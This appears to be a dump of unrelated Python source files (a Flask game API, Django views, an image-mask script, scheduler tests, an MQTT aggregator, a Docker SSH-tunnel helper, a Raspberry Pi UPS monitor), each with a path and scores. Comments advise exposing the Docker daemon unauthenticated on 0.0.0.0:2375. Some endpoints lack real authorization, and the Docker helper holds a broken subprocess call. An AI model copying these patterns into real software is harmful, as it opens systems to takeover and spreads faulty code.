account = Account.get_or_create(req['user_name'])
this_game = Game.query.filter_by(id=id).first()
# Verify request is genuine.
if this_game.account.id != account.id:
return jsonify({'success': False}), UNAUTHORIZED
else:
# Get or create coordinated for unique game.
coords = Coords.get_or_create(this_game)
coords.add_coords(req['player'], req['coords'])
# Save new data.
add_then_commit(coords)
return jsonify({'success': True}), CREATED
else:
return jsonify({'success': False}), BAD_REQUEST
@game.route('/game/<id>/won', methods=['PUT'])
@cross_origin()
def game_results(id):
""" Update game results.
Returns:
dict: JSON Success or Error response.
"""
if 'user_name' in request.json:
# Re-assign request object.
req = request.get_json()
# Gather Account & Game related info.
account = Account.get_or_create(req['user_name'])
this_game = Game.query.filter_by(id=id).first()
# Verify request is genuine.
if this_game.account.id != account.id:
return jsonify({'success': False}), UNAUTHORIZED
else:
# Get or create coordinated for unique game.
this_game.won = True
# Save new data.
add_then_commit(this_game)
return jsonify({'success': True}), OK_REQUEST
else:
return jsonify({'success': False}), BAD_REQUEST | battleship/game/views.py | from flask import Blueprint, jsonify, request
from flask_cors import cross_origin
from battleship import db
from battleship.helpers import OK_REQUEST, BAD_REQUEST, CREATED, \
UNAUTHORIZED, \
add_then_commit
from battleship.models import Account, Coords, Game
# Create new flask blueprint
game = Blueprint('game', __name__)
@game.route('/game', methods=['POST'])
@cross_origin()
def create_game():
""" Get or Create Account & Create New Game.
Returns:
dict: JSON Success or Error response.
"""
if 'user_name' in request.json:
# Create or get account & create game.
account = Account.get_or_create(request.json['user_name'])
new_game = Game()
# Create relationship & save.
account.games.append(new_game)
add_then_commit(account)
return jsonify({'success': True, 'game_id': new_game.id}), CREATED
else:
return jsonify({'success': False}), BAD_REQUEST
@game.route('/game/<id>', methods=['DELETE'])
@cross_origin()
def delete_game(id):
""" Delete game.
Returns:
dict: JSON Success or Error response.
"""
this_game = Game.query.filter_by(id=id).first()
if this_game is not None:
Game.query.filter_by(id=id).delete()
db.session.commit()
return jsonify({'success': True}), OK_REQUEST
else:
return jsonify({'success': False}), BAD_REQUEST
@game.route('/game/<id>/coords', methods=['PUT'])
@cross_origin()
def game_coords(id):
""" Add user or cpu coordinates to new game.
Returns:
dict: JSON Success or Error response.
"""
if 'user_name' in request.json:
# Re-assign request object.
req = request.json
# Gather Account & Game related info.
account = Account.get_or_create(req['user_name'])
this_game = Game.query.filter_by(id=id).first()
# Verify request is genuine.
if this_game.account.id != account.id:
return jsonify({'success': False}), UNAUTHORIZED
else:
# Get or create coordinated for unique game.
coords = Coords.get_or_create(this_game)
coords.add_coords(req['player'], req['coords'])
# Save new data.
add_then_commit(coords)
return jsonify({'success': True}), CREATED
else:
return jsonify({'success': False}), BAD_REQUEST
@game.route('/game/<id>/won', methods=['PUT'])
@cross_origin()
def game_results(id):
""" Update game results.
Returns:
dict: JSON Success or Error response.
"""
if 'user_name' in request.json:
# Re-assign request object.
req = request.get_json()
# Gather Account & Game related info.
account = Account.get_or_create(req['user_name'])
this_game = Game.query.filter_by(id=id).first()
# Verify request is genuine.
if this_game.account.id != account.id:
return jsonify({'success': False}), UNAUTHORIZED
else:
# Get or create coordinated for unique game.
this_game.won = True
# Save new data.
add_then_commit(this_game)
return jsonify({'success': True}), OK_REQUEST
else:
return jsonify({'success': False}), BAD_REQUEST | 0.377082 | 0.077274 |
from django.shortcuts import render
from django.views.generic.list import ListView
from mainApp.models import Faculty
import teachers, rooms, lesson
def index(request):
return render(request, 'mainApp/index.html')
def instruments(request):
instruemnts_name = request.GET.get('name') or []
facultys = Faculty.objects.all()
items = []
for _ in instruemnts_name.split(','):
items.append(_)
if not items:
items.append("Не переданны имена инструментов")
global put
put = request.get_full_path()
put = put.replace('/instruments/?name=','')
return render(request, 'mainApp/parameters.html', {'values': items, 'name': facultys})
def test(request):
faculty = request.POST.get('post_faculty')
group = request.POST.get('post_group')
discipline = request.POST.get('post_discipline')
name_teacher = request.POST.get('post_name_teacher')
date_week = request.POST.get('post_date_week')
audience = request.POST.get('post_audience')
adress = request.POST.get('post_adress')
date_range = request.POST.get('post_date_range')
date_start = request.POST.get('post_date_start')
if put == '1-1':
items = rooms.tool_1_1()
elif put == '1-2':
items = rooms.tool_1_2()
elif put == '1-3':
tool = adress + ', ' + audience
items = rooms.tool_1_3(tool)
elif put == '2-1':
items = teachers.tool_2_1_1(faculty, group)
elif put == '2-2':
items = teachers.tool_2_1_2(faculty, discipline)
elif put == '2-3':
items = teachers.tool_2_2_1(faculty, group)
elif put == '2-4':
items = teachers.tool_2_2_2(faculty, discipline)
elif put == '2-5':
items = teachers.tool_2_3(faculty,name_teacher,date_week)
elif put == '3-1':
items = lesson.tool_3_1(faculty,group,date_week)
elif put == '3-2':
items = lesson.tool_3_2(faculty, group, discipline)
elif put == '3-3':
items = lesson.tool_3_3(faculty, group, date_week)
elif put == '3-4':
items = lesson.tool_3_4(faculty, group, discipline)
elif put == '3-5':
items = lesson.tool_3_5(faculty, date_week)
return render(request, 'mainApp/test.html',{'photo': items,'tt': discipline, 'dd': group,'oo': put}) | mainApp/views.py | from django.shortcuts import render
from django.views.generic.list import ListView
from mainApp.models import Faculty
import teachers, rooms, lesson
def index(request):
return render(request, 'mainApp/index.html')
def instruments(request):
instruemnts_name = request.GET.get('name') or []
facultys = Faculty.objects.all()
items = []
for _ in instruemnts_name.split(','):
items.append(_)
if not items:
items.append("Не переданны имена инструментов")
global put
put = request.get_full_path()
put = put.replace('/instruments/?name=','')
return render(request, 'mainApp/parameters.html', {'values': items, 'name': facultys})
def test(request):
faculty = request.POST.get('post_faculty')
group = request.POST.get('post_group')
discipline = request.POST.get('post_discipline')
name_teacher = request.POST.get('post_name_teacher')
date_week = request.POST.get('post_date_week')
audience = request.POST.get('post_audience')
adress = request.POST.get('post_adress')
date_range = request.POST.get('post_date_range')
date_start = request.POST.get('post_date_start')
if put == '1-1':
items = rooms.tool_1_1()
elif put == '1-2':
items = rooms.tool_1_2()
elif put == '1-3':
tool = adress + ', ' + audience
items = rooms.tool_1_3(tool)
elif put == '2-1':
items = teachers.tool_2_1_1(faculty, group)
elif put == '2-2':
items = teachers.tool_2_1_2(faculty, discipline)
elif put == '2-3':
items = teachers.tool_2_2_1(faculty, group)
elif put == '2-4':
items = teachers.tool_2_2_2(faculty, discipline)
elif put == '2-5':
items = teachers.tool_2_3(faculty,name_teacher,date_week)
elif put == '3-1':
items = lesson.tool_3_1(faculty,group,date_week)
elif put == '3-2':
items = lesson.tool_3_2(faculty, group, discipline)
elif put == '3-3':
items = lesson.tool_3_3(faculty, group, date_week)
elif put == '3-4':
items = lesson.tool_3_4(faculty, group, discipline)
elif put == '3-5':
items = lesson.tool_3_5(faculty, date_week)
return render(request, 'mainApp/test.html',{'photo': items,'tt': discipline, 'dd': group,'oo': put}) | 0.254972 | 0.140189 |
import numpy as np
import matplotlib
import os
import glob
from tensorflow.keras.preprocessing import image
import PIL
import matplotlib.pyplot as plt
PIL.Image.MAX_IMAGE_PIXELS = 933120000
masks_folder = "F:/Datasets/DigestPath/masks"
images_folder = "F:/Datasets/DigestPath/images"
outfolder = "F:/Datasets/DigestPath/tri_masks_3diffcolors_new"
outfolder_images = "F:/Datasets/DigestPath/images_new"
masks_paths = glob.glob(os.path.join(masks_folder,"*.png"))
if not os.path.exists(outfolder):
os.makedirs(outfolder)
if not os.path.exists(outfolder_images):
os.makedirs(outfolder_images)
def extract_image(mask_path):
mask_name = os.path.split(mask_path)[1]
mask_name = mask_name.split(".")[0]+".png"
img_name = mask_name.split(".")[0]+".jpg"
img_path = os.path.join(images_folder,img_name)
mask = image.load_img(mask_path)
img = image.load_img(img_path)
mask_np = image.img_to_array(mask)
image_np = image.img_to_array(img)
if mask_np.shape[2] == 4:
mask_np = mask_np[:,:,:3]
if image_np.shape[2] == 4:
image_np = image_np[:,:,:3]
mask_axis_max = np.max(mask_np,axis=2)
mask_np[:, :, 0] = mask_axis_max
mask_np[:, :, 1] = mask_axis_max
mask_np[:, :, 2] = mask_axis_max
mask_np[mask_np < 100] = 0 #tissue + white portion
mask_np[mask_np >= 100] = 2 #glands
image_axis_min = np.mean(image_np, axis=2)
image_np[:, :, 0] = image_axis_min
image_np[:, :, 1] = image_axis_min
image_np[:, :, 2] = image_axis_min
image_np[image_np >= 230] = 255 #white portion -> 1 tissue (after inversion)
image_np[image_np < 230] = 0 #tissue -> 0 white portion (after inversion)
image_np=image_np/255
image_np = 1 - image_np
new_mk = mask_np+image_np
new_mk[:, :, 0][new_mk[:, :, 0]==0] = 0 #white background : Blue color
new_mk[:, :, 1][new_mk[:, :, 1]==0] = 0 #white background : Blue color
new_mk[:, :, 2][new_mk[:, :, 2]==0] = 255 #white background : Blue color
new_mk[:, :, 0][new_mk[:, :, 0] == 1] = 255 # tissue region : Red color
new_mk[:, :, 1][new_mk[:, :, 1] == 1] = 0 # tissue region : Red color
new_mk[:, :, 2][new_mk[:, :, 2] == 1] = 0 # tissue region : Red color
new_mk[:, :, 0][new_mk[:, :, 0] == 2] = 0 # Glands : Green color
new_mk[:, :, 1][new_mk[:, :, 1] == 2] = 255 # Glands : Green color
new_mk[:, :, 2][new_mk[:, :, 2] == 2] = 0 # Glands : Green color
new_mk[:, :, 0][new_mk[:, :, 0] == 3] = 0 # Glands : Green color
new_mk[:, :, 1][new_mk[:, :, 1] == 3] = 255 # Glands : Green color
new_mk[:, :, 2][new_mk[:, :, 2] == 3] = 0 # Glands : Green color
#new_mk = new_mk/255.0
#plt.imshow(new_mk)
#plt.show()
print(mask_name)
image.save_img(os.path.join(outfolder,mask_name),new_mk)
#image.save_img(os.path.join(outfolder_images,img_name),img)
for path in masks_paths:
if("neg" in path):
print(path)
extract_image(path) | DigestPath/collect_masks_optimized.py | import numpy as np
import matplotlib
import os
import glob
from tensorflow.keras.preprocessing import image
import PIL
import matplotlib.pyplot as plt
PIL.Image.MAX_IMAGE_PIXELS = 933120000
masks_folder = "F:/Datasets/DigestPath/masks"
images_folder = "F:/Datasets/DigestPath/images"
outfolder = "F:/Datasets/DigestPath/tri_masks_3diffcolors_new"
outfolder_images = "F:/Datasets/DigestPath/images_new"
masks_paths = glob.glob(os.path.join(masks_folder,"*.png"))
if not os.path.exists(outfolder):
os.makedirs(outfolder)
if not os.path.exists(outfolder_images):
os.makedirs(outfolder_images)
def extract_image(mask_path):
mask_name = os.path.split(mask_path)[1]
mask_name = mask_name.split(".")[0]+".png"
img_name = mask_name.split(".")[0]+".jpg"
img_path = os.path.join(images_folder,img_name)
mask = image.load_img(mask_path)
img = image.load_img(img_path)
mask_np = image.img_to_array(mask)
image_np = image.img_to_array(img)
if mask_np.shape[2] == 4:
mask_np = mask_np[:,:,:3]
if image_np.shape[2] == 4:
image_np = image_np[:,:,:3]
mask_axis_max = np.max(mask_np,axis=2)
mask_np[:, :, 0] = mask_axis_max
mask_np[:, :, 1] = mask_axis_max
mask_np[:, :, 2] = mask_axis_max
mask_np[mask_np < 100] = 0 #tissue + white portion
mask_np[mask_np >= 100] = 2 #glands
image_axis_min = np.mean(image_np, axis=2)
image_np[:, :, 0] = image_axis_min
image_np[:, :, 1] = image_axis_min
image_np[:, :, 2] = image_axis_min
image_np[image_np >= 230] = 255 #white portion -> 1 tissue (after inversion)
image_np[image_np < 230] = 0 #tissue -> 0 white portion (after inversion)
image_np=image_np/255
image_np = 1 - image_np
new_mk = mask_np+image_np
new_mk[:, :, 0][new_mk[:, :, 0]==0] = 0 #white background : Blue color
new_mk[:, :, 1][new_mk[:, :, 1]==0] = 0 #white background : Blue color
new_mk[:, :, 2][new_mk[:, :, 2]==0] = 255 #white background : Blue color
new_mk[:, :, 0][new_mk[:, :, 0] == 1] = 255 # tissue region : Red color
new_mk[:, :, 1][new_mk[:, :, 1] == 1] = 0 # tissue region : Red color
new_mk[:, :, 2][new_mk[:, :, 2] == 1] = 0 # tissue region : Red color
new_mk[:, :, 0][new_mk[:, :, 0] == 2] = 0 # Glands : Green color
new_mk[:, :, 1][new_mk[:, :, 1] == 2] = 255 # Glands : Green color
new_mk[:, :, 2][new_mk[:, :, 2] == 2] = 0 # Glands : Green color
new_mk[:, :, 0][new_mk[:, :, 0] == 3] = 0 # Glands : Green color
new_mk[:, :, 1][new_mk[:, :, 1] == 3] = 255 # Glands : Green color
new_mk[:, :, 2][new_mk[:, :, 2] == 3] = 0 # Glands : Green color
#new_mk = new_mk/255.0
#plt.imshow(new_mk)
#plt.show()
print(mask_name)
image.save_img(os.path.join(outfolder,mask_name),new_mk)
#image.save_img(os.path.join(outfolder_images,img_name),img)
for path in masks_paths:
if("neg" in path):
print(path)
extract_image(path) | 0.206094 | 0.441492 |
from datetime import datetime, timedelta
from rx.concurrency import Scheduler, CurrentThreadScheduler
def test_currentthread_now():
res = Scheduler.now() - datetime.utcnow()
assert res < timedelta(milliseconds=1000)
def test_currentthread_scheduleaction():
scheduler = CurrentThreadScheduler()
ran = False
def action(scheduler, state=None):
nonlocal ran
ran = True
scheduler.schedule(action)
assert ran == True
def test_currentthread_scheduleactionerror():
scheduler = CurrentThreadScheduler()
class MyException(Exception):
pass
def action(scheduler, state=None):
raise MyException()
try:
return scheduler.schedule(action)
except MyException:
assert True
def test_currentthread_scheduleactionnested():
scheduler = CurrentThreadScheduler()
ran = False
def action(scheduler, state=None):
def inner_action(scheduler, state=None):
nonlocal ran
ran = True
return scheduler.schedule(inner_action)
scheduler.schedule(action)
assert ran == True
def test_currentthread_ensuretrampoline():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduer, state=None):
def action1(scheduler, state=None):
nonlocal ran1
ran1 = True
scheduler.schedule(action1)
def action2(scheduler, state=None):
nonlocal ran2
ran2 = True
return scheduler.schedule(action2)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == True
def test_currentthread_ensuretrampoline_nested():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduler, state):
def inner_action1(scheduler, state):
nonlocal ran1
ran1 = True
scheduler.ensure_trampoline(inner_action1)
def inner_action2(scheduler, state):
nonlocal ran2
ran2 = True
return scheduler.ensure_trampoline(inner_action2)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == True
def test_currentthread_ensuretrampoline_and_cancel():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduler, state):
def inner_action1(scheduler, state):
nonlocal ran1
ran1 = True
def inner_action2(scheduler, state):
nonlocal ran2
ran2 = True
d = scheduler.schedule(inner_action2)
d.dispose()
return scheduler.schedule(inner_action1)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == False
def test_currentthread_ensuretrampoline_and_canceltimed():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduler, state):
def inner_action1(scheduler, state):
nonlocal ran1
ran1 = True
def inner_action2(scheduler, state):
nonlocal ran2
ran2 = True
d = scheduler.schedule_relative(timedelta(milliseconds=500), inner_action2)
d.dispose()
return scheduler.schedule(inner_action1)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == False | tests/test_currentthreadscheduler.py | from datetime import datetime, timedelta
from rx.concurrency import Scheduler, CurrentThreadScheduler
def test_currentthread_now():
res = Scheduler.now() - datetime.utcnow()
assert res < timedelta(milliseconds=1000)
def test_currentthread_scheduleaction():
scheduler = CurrentThreadScheduler()
ran = False
def action(scheduler, state=None):
nonlocal ran
ran = True
scheduler.schedule(action)
assert ran == True
def test_currentthread_scheduleactionerror():
scheduler = CurrentThreadScheduler()
class MyException(Exception):
pass
def action(scheduler, state=None):
raise MyException()
try:
return scheduler.schedule(action)
except MyException:
assert True
def test_currentthread_scheduleactionnested():
scheduler = CurrentThreadScheduler()
ran = False
def action(scheduler, state=None):
def inner_action(scheduler, state=None):
nonlocal ran
ran = True
return scheduler.schedule(inner_action)
scheduler.schedule(action)
assert ran == True
def test_currentthread_ensuretrampoline():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduer, state=None):
def action1(scheduler, state=None):
nonlocal ran1
ran1 = True
scheduler.schedule(action1)
def action2(scheduler, state=None):
nonlocal ran2
ran2 = True
return scheduler.schedule(action2)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == True
def test_currentthread_ensuretrampoline_nested():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduler, state):
def inner_action1(scheduler, state):
nonlocal ran1
ran1 = True
scheduler.ensure_trampoline(inner_action1)
def inner_action2(scheduler, state):
nonlocal ran2
ran2 = True
return scheduler.ensure_trampoline(inner_action2)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == True
def test_currentthread_ensuretrampoline_and_cancel():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduler, state):
def inner_action1(scheduler, state):
nonlocal ran1
ran1 = True
def inner_action2(scheduler, state):
nonlocal ran2
ran2 = True
d = scheduler.schedule(inner_action2)
d.dispose()
return scheduler.schedule(inner_action1)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == False
def test_currentthread_ensuretrampoline_and_canceltimed():
scheduler = CurrentThreadScheduler()
ran1, ran2 = False, False
def outer_action(scheduler, state):
def inner_action1(scheduler, state):
nonlocal ran1
ran1 = True
def inner_action2(scheduler, state):
nonlocal ran2
ran2 = True
d = scheduler.schedule_relative(timedelta(milliseconds=500), inner_action2)
d.dispose()
return scheduler.schedule(inner_action1)
scheduler.ensure_trampoline(outer_action)
assert ran1 == True
assert ran2 == False | 0.639849 | 0.410756 |
import argparse
import json
import mqttClient as mqc
import time
def on_login(users):
convertedUsers = []
for user in users:
loggedInUser = loggedInUsers.get(user)
if loggedInUser is None:
loggedInUser = {"count":0,"ids":[]}
convertedUsers.append(user)
loggedInUser["count"] = loggedInUser["count"] + 1;
loggedInUsers[user] = loggedInUser
print("User:", user, "count:", loggedInUser["count"])
if convertedUsers:
print("New login users:", convertedUsers)
message = {"action":"login", "message":{"users":convertedUsers}}
mqttClient.publish(args["mqttTopic"], json.dumps(message))
def on_logout(users):
convertedUsers = []
for user in users:
loggedInUser = loggedInUsers.get(user)
if loggedInUser is not None:
loggedInUser["count"] = loggedInUser["count"] - 1;
print("User:", user, "count:", loggedInUser["count"])
if loggedInUser["count"] <= 0:
del loggedInUsers[user]
convertedUsers.append(user)
else:
loggedInUsers[user] = loggedInUser
if convertedUsers:
print("New logout users:", convertedUsers)
message = {"action":"logout", "message":{"users":convertedUsers}}
mqttClient.publish(args["mqttTopic"], json.dumps(message))
def on_message_msgs(mosq, obj, msg):
# TODO: Parse out json
# Add camera identifier to json?
# Add to Login list if login
# Remove count from login list if logout
jsonMessage = json.loads(msg.payload)
action = jsonMessage["action"]
print("Action: " + action)
if(action == "login"):
on_login(jsonMessage["message"]["users"])
elif(action == "logout"):
on_logout(jsonMessage["message"]["users"])
print("Started")
loggedInUsers = {}
ap = argparse.ArgumentParser()
ap.add_argument("-mqh", "--mqttHost", type=str, required=False, default="eclipse-mosquitto",
help="MQTT server address or IP")
ap.add_argument("-mqp", "--mqttPort", type=int, required=False, default=1883,
help="MQTT server Port")
ap.add_argument("-mqt", "--mqttTopic", type=str, required=False, default="facialrecognition/converted",
help="MQTT topic to publish messages to")
ap.add_argument("-mqts", "--mqttTopicSub", type=str, required=False, default="facialrecognition/raw",
help="MQTT topic to publish messages to")
# TODO: Add generic MQTT options param in json form to support ssl certs/self signed certs
args = vars(ap.parse_args())
mqttClient = mqc.Client("converter-facial-rec", clean_session=False)
mqttClient.message_callback_add(args["mqttTopicSub"], on_message_msgs)
mqttClient.subscribe(args["mqttTopicSub"])
print("Connecting to mqtt client {}:{}".format(args["mqttHost"], args["mqttPort"]))
mqttClient.start_forever(args["mqttHost"], args["mqttPort"]) | tools/mqttMessageAggregator.py | import argparse
import json
import mqttClient as mqc
import time
def on_login(users):
convertedUsers = []
for user in users:
loggedInUser = loggedInUsers.get(user)
if loggedInUser is None:
loggedInUser = {"count":0,"ids":[]}
convertedUsers.append(user)
loggedInUser["count"] = loggedInUser["count"] + 1;
loggedInUsers[user] = loggedInUser
print("User:", user, "count:", loggedInUser["count"])
if convertedUsers:
print("New login users:", convertedUsers)
message = {"action":"login", "message":{"users":convertedUsers}}
mqttClient.publish(args["mqttTopic"], json.dumps(message))
def on_logout(users):
convertedUsers = []
for user in users:
loggedInUser = loggedInUsers.get(user)
if loggedInUser is not None:
loggedInUser["count"] = loggedInUser["count"] - 1;
print("User:", user, "count:", loggedInUser["count"])
if loggedInUser["count"] <= 0:
del loggedInUsers[user]
convertedUsers.append(user)
else:
loggedInUsers[user] = loggedInUser
if convertedUsers:
print("New logout users:", convertedUsers)
message = {"action":"logout", "message":{"users":convertedUsers}}
mqttClient.publish(args["mqttTopic"], json.dumps(message))
def on_message_msgs(mosq, obj, msg):
# TODO: Parse out json
# Add camera identifier to json?
# Add to Login list if login
# Remove count from login list if logout
jsonMessage = json.loads(msg.payload)
action = jsonMessage["action"]
print("Action: " + action)
if(action == "login"):
on_login(jsonMessage["message"]["users"])
elif(action == "logout"):
on_logout(jsonMessage["message"]["users"])
print("Started")
loggedInUsers = {}
ap = argparse.ArgumentParser()
ap.add_argument("-mqh", "--mqttHost", type=str, required=False, default="eclipse-mosquitto",
help="MQTT server address or IP")
ap.add_argument("-mqp", "--mqttPort", type=int, required=False, default=1883,
help="MQTT server Port")
ap.add_argument("-mqt", "--mqttTopic", type=str, required=False, default="facialrecognition/converted",
help="MQTT topic to publish messages to")
ap.add_argument("-mqts", "--mqttTopicSub", type=str, required=False, default="facialrecognition/raw",
help="MQTT topic to publish messages to")
# TODO: Add generic MQTT options param in json form to support ssl certs/self signed certs
args = vars(ap.parse_args())
mqttClient = mqc.Client("converter-facial-rec", clean_session=False)
mqttClient.message_callback_add(args["mqttTopicSub"], on_message_msgs)
mqttClient.subscribe(args["mqttTopicSub"])
print("Connecting to mqtt client {}:{}".format(args["mqttHost"], args["mqttPort"]))
mqttClient.start_forever(args["mqttHost"], args["mqttPort"]) | 0.106667 | 0.050191 |
import docker
import subprocess
import time
from app.config_const import *
#SETUP sul SERVER DOCKER:
# rimuovi il docker pid: sudo rm /var/run/docker.pid
# stoppa il servizio docker: sudo systemctl stop docker
# starta il demone docker sulla tua porta: sudo dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
#Comando da dare in caso si voglia fare una macchina docker
#sudo rm /var/run/docker.pid && sudo systemctl stop docker && sudo dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
#client = docker.DockerClient(base_url='tcp://127.0.0.1:7000')
ports_dict = {'80/tcp': 123}
#docker run -d -p 123:80 giussorama/repo:latest
#lab_started = client.containers.run("giussorama/repo:latest", detach=True, name="lab1", auto_remove=True, ports=ports_dict)
#print(lab_started)
# ssh -i "challange.pem" ubuntu@ec2-52-3-245-151.compute-1.amazonaws.com -Nf -L 7000:127.0.0.1:2375
# -Nf = in background e senza interattività
def get_docker_client(url_server_docker, low=False):
#Comando per controllare se la porta in questione è usata
cmd_check_tunnel = "nc -z localhost "+str(LOCAL_PORT)+" || echo \"no tunnel open\""
#Provo a prendere il client
try:
result = subprocess.check_output(cmd_check_tunnel, shell=True)
#print("\n\n\nResult of tunnel-> "+ str(result) + " \n\n\n")
if "no tunnel open" in str(result): #vuol dire che ha stampato "no tunnel open"
#print("non c'è il tunnel")
#print("\n\nIl Tunnel non c'è")
raise Exception("Il Tunnel non c'è")
else:
#print("\n\nil tunnell c'è ->"+str(result))
pass
if low == False:
client = docker.DockerClient(base_url=url_server_docker)
else:
client = docker.APIClient(base_url=url_server_docker)
except Exception as e:
print("\n\n\n Excepted ("+str(e.args)+")\n\n\n")
#Impossibile trovare l'API Docker su questo indirizzo
#Facciamo il set up del tunnel ssh
#Comando: ssh -i "challange.pem" ubuntu@ec2-52-3-245-151.compute-1.amazonaws.com -Nf -L 7000:127.0.0.1:2375
cmd = "ssh -i \""+FULL_PATH_SSH_KEY+"\" "+USER_SERVER+"@"+DNS_NAME_SERVER+" -Nf -L "+str(LOCAL_PORT)+":127.0.0.1:"+str(REMOTE_PORT)
result = subprocess.check_output(cmd, shell=True)
time.sleep(1) # Aspettiamo 1 secondo per fare in modo che il tunnel SSH sia attivo
#Riproviamo a prendere il client
try:
result = subprocess.check_output(result = subprocess.check_output(cmd_check_tunnel, shell=True), shell=True)
if len(str(result)) > 5: #vuol dire che ha stampato "no tunnel open"
#print("non c'è il tunnel")
print("\n\nImpossibile stabilire il tunnel ssh, non è possibile comunicare con la macchina docker")
raise Exception("Impossibile stabilire il tunnel ssh, non è possibile comunicare con la macchina docker")
else:
print("\n\nil tunnell c'è")
pass
if low == False:
client = docker.DockerClient(base_url=url_server_docker)
else:
client = docker.APIClient(base_url=url_server_docker)
except:
raise Exception('Errore', 'Impossibile creare il client con l\'url specificato')
return client | app/setup_docker_client.py | import docker
import subprocess
import time
from app.config_const import *
#SETUP sul SERVER DOCKER:
# rimuovi il docker pid: sudo rm /var/run/docker.pid
# stoppa il servizio docker: sudo systemctl stop docker
# starta il demone docker sulla tua porta: sudo dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
#Comando da dare in caso si voglia fare una macchina docker
#sudo rm /var/run/docker.pid && sudo systemctl stop docker && sudo dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
#client = docker.DockerClient(base_url='tcp://127.0.0.1:7000')
ports_dict = {'80/tcp': 123}
#docker run -d -p 123:80 giussorama/repo:latest
#lab_started = client.containers.run("giussorama/repo:latest", detach=True, name="lab1", auto_remove=True, ports=ports_dict)
#print(lab_started)
# ssh -i "challange.pem" ubuntu@ec2-52-3-245-151.compute-1.amazonaws.com -Nf -L 7000:127.0.0.1:2375
# -Nf = in background e senza interattività
def get_docker_client(url_server_docker, low=False):
#Comando per controllare se la porta in questione è usata
cmd_check_tunnel = "nc -z localhost "+str(LOCAL_PORT)+" || echo \"no tunnel open\""
#Provo a prendere il client
try:
result = subprocess.check_output(cmd_check_tunnel, shell=True)
#print("\n\n\nResult of tunnel-> "+ str(result) + " \n\n\n")
if "no tunnel open" in str(result): #vuol dire che ha stampato "no tunnel open"
#print("non c'è il tunnel")
#print("\n\nIl Tunnel non c'è")
raise Exception("Il Tunnel non c'è")
else:
#print("\n\nil tunnell c'è ->"+str(result))
pass
if low == False:
client = docker.DockerClient(base_url=url_server_docker)
else:
client = docker.APIClient(base_url=url_server_docker)
except Exception as e:
print("\n\n\n Excepted ("+str(e.args)+")\n\n\n")
#Impossibile trovare l'API Docker su questo indirizzo
#Facciamo il set up del tunnel ssh
#Comando: ssh -i "challange.pem" ubuntu@ec2-52-3-245-151.compute-1.amazonaws.com -Nf -L 7000:127.0.0.1:2375
cmd = "ssh -i \""+FULL_PATH_SSH_KEY+"\" "+USER_SERVER+"@"+DNS_NAME_SERVER+" -Nf -L "+str(LOCAL_PORT)+":127.0.0.1:"+str(REMOTE_PORT)
result = subprocess.check_output(cmd, shell=True)
time.sleep(1) # Aspettiamo 1 secondo per fare in modo che il tunnel SSH sia attivo
#Riproviamo a prendere il client
try:
result = subprocess.check_output(result = subprocess.check_output(cmd_check_tunnel, shell=True), shell=True)
if len(str(result)) > 5: #vuol dire che ha stampato "no tunnel open"
#print("non c'è il tunnel")
print("\n\nImpossibile stabilire il tunnel ssh, non è possibile comunicare con la macchina docker")
raise Exception("Impossibile stabilire il tunnel ssh, non è possibile comunicare con la macchina docker")
else:
print("\n\nil tunnell c'è")
pass
if low == False:
client = docker.DockerClient(base_url=url_server_docker)
else:
client = docker.APIClient(base_url=url_server_docker)
except:
raise Exception('Errore', 'Impossibile creare il client con l\'url specificato')
return client | 0.047459 | 0.061115 |
import RPi.GPIO as GPIO
import os
import time
from datetime import datetime
GPIO.setmode(GPIO.BCM)
#do not use
#PIN_FACTORY_RESET_17 = 17 # factory reset
#PIN_UPS_PICO_1 = 27
#PIN_UPS_PICO_2 = 22
PIN_COM = 25
PIN_POWER_PRESENT = 22
#GPIO_10 True if SpectrooUPS installed
PIN_ID=10
GPIO.setwarnings(False)
GPIO.setup(PIN_POWER_PRESENT, GPIO.IN)
GPIO.setup(PIN_COM, GPIO.IN)
GPIO.setup(PIN_ID, GPIO.IN)
IS_UPS_INSTALLED=False
IS_SHUTDOWN_REQUIRED=False
TS_NOPOWER=None
print "Searching for Spectroo UPS..."
while(True):
GPIO.setup(PIN_COM, GPIO.IN)
PIN_COM_VALUE = GPIO.input(PIN_COM)
PIN_ID_VALUE = GPIO.input(PIN_ID)
#send 100ms 0 to UPS #watchdog
GPIO.setup(PIN_COM, GPIO.OUT)
GPIO.output(PIN_COM,False)
time.sleep(0.1)
if IS_UPS_INSTALLED == True and PIN_ID_VALUE == False:
IS_UPS_INSTALLED=False
print "Spectroo UPS disconected."
if PIN_ID_VALUE == False:
#sleep 5 seconds if UPS is not detected
time.sleep(5)
continue
if IS_UPS_INSTALLED == False and PIN_ID_VALUE == True:
IS_UPS_INSTALLED=True
print "Spectroo UPS detected."
if IS_UPS_INSTALLED == True and PIN_COM_VALUE == False:
IS_SHUTDOWN_REQUIRED=True
IS_POWER_PRESENT_VALUE = GPIO.input(PIN_POWER_PRESENT)
if IS_UPS_INSTALLED == True and IS_POWER_PRESENT_VALUE == False:
if TS_NOPOWER is None:
TS_NOPOWER=datetime.now()
else:
try:
diff = (datetime.now() - TS_NOPOWER)
diff = diff.total_seconds()
if diff > 20:
IS_SHUTDOWN_REQUIRED=True
print "Power not present for more than 20 seconds ... shutdown flag true"
except:
pass
else:
TS_NOPOWER=None
IS_SHUTDOWN_REQUIRED=False
#test id shutdown is notified by ups
GPIO.setup(PIN_COM, GPIO.IN)
time.sleep(0.2)
